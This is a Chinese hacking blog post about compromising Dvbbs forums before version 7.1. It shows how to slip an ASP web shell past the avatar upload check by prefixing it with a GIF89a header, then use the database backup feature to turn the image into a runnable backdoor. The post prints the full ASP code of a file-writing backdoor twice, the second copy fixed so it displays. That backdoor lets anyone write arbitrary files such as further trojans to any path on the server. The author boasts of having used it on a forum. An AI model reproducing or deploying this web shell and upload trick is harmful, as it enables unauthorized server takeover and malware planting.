鬼仔's Blog

文章编辑:NetHacking 来源：http://www.powers.com.cn 作者:喜欢忧伤

背景：
(1)动网上传文件，备份得到后门
(2)使用GIF89a可以上传内容为木马的gif图片：逃过头像上传的检测。
所以产生了新的方法：上传gif头像图片，备份得到木马了。(使用范围为:动网7.1以前的版本)

但是很多人在执行后门后出现的是一张不能显示的图片．

偶还是公布一下我用了恩久的更方便的方法，同时解释一下为什么会出现这种情况．：
就是GIF89a加站长助手，运行后门的时候看到的就是站长助手的界面，唯一的不同就是左上角多了GIF89a几个字。这个方法在一看到背景（2）就用在一个论坛的测试上了。。呵呵

gif内容如下：
—–以下为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)—-
GIF89a
<%
‘站长助手的内容…省略．．．
%>
</body>
</center>
—–以上为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)—-

其实真正问题是这样的：
执行由gif文件恢复过来的asp,最后显示成一张不能显示的图片：
其实这个过程有两个：
(1)asp解释执行
(2)你的浏览器的显示．
(1)是没有问题．
现在问题是出在你的(2)上面的．
(2)出问题的原因是浏览器的解释问题．
解决办法：只要把显示的代码放到<body></body>之间就可以了．
本来是这样的：执行后显示一张不能显示的图片．
GIF89a
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject(“Scripting.FileSystemObject”) %>
<% if Trim(request(“syfdpath”))<>”” then %>
<% fdata = request(“cyfddata”) %>
<% Set objCountFile=objFSO.createTextFile(request(“syfdpath”),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write “<font color=red>save Success!</font>” %>
<% else %>
<% response.write “<font color=red>Save UnSuccess!</font>” %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write “<form action=” method=post>” %>
<% Response.write “保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>” %>
<% Response.Write “<input type=text name=syfdpath width=32 size=50>” %>
<% Response.Write “<br>” %>
<% Response.write “本文件绝对路径” %>
<% =server.mappath(Request.ServerVariables(“SCRIPT_NAME”)) %>
<% Response.write “<br>” %>
<% Response.write “输入马的内容:” %>
<% Response.write “<textarea name=cyfddata cols=80 rows=10 width=32></textarea>” %>
<% Response.write “<input type=submit value=保存>” %>
<% Response.write “</form>” %>

修改后：执行正常了。．后门就正常使用了。．哈哈

GIF89a
<body>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.createObject(“Scripting.FileSystemObject”) %>
<% if Trim(request(“syfdpath”))<>”” then %>
<% fdata = request(“cyfddata”) %>
<% Set objCountFile=objFSO.createTextFile(request(“syfdpath”),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write “<font color=red>save Success!</font>” %>
<% else %>
<% response.write “<font color=red>Save UnSuccess!</font>” %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write “<form action=” method=post>” %>
<% Response.write “保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>” %>
<% Response.Write “<input type=text name=syfdpath width=32 size=50>” %>
<% Response.Write “<br>” %>
<% Response.write “本文件绝对路径” %>
<% =server.mappath(Request.ServerVariables(“SCRIPT_NAME”)) %>
<% Response.write “<br>” %>
<% Response.write “输入马的内容:” %>
<% Response.write “<textarea name=cyfddata cols=80 rows=10 width=32></textarea>” %>
<% Response.write “<input type=submit value=保存>” %>
<% Response.write “</form>” %>
</body>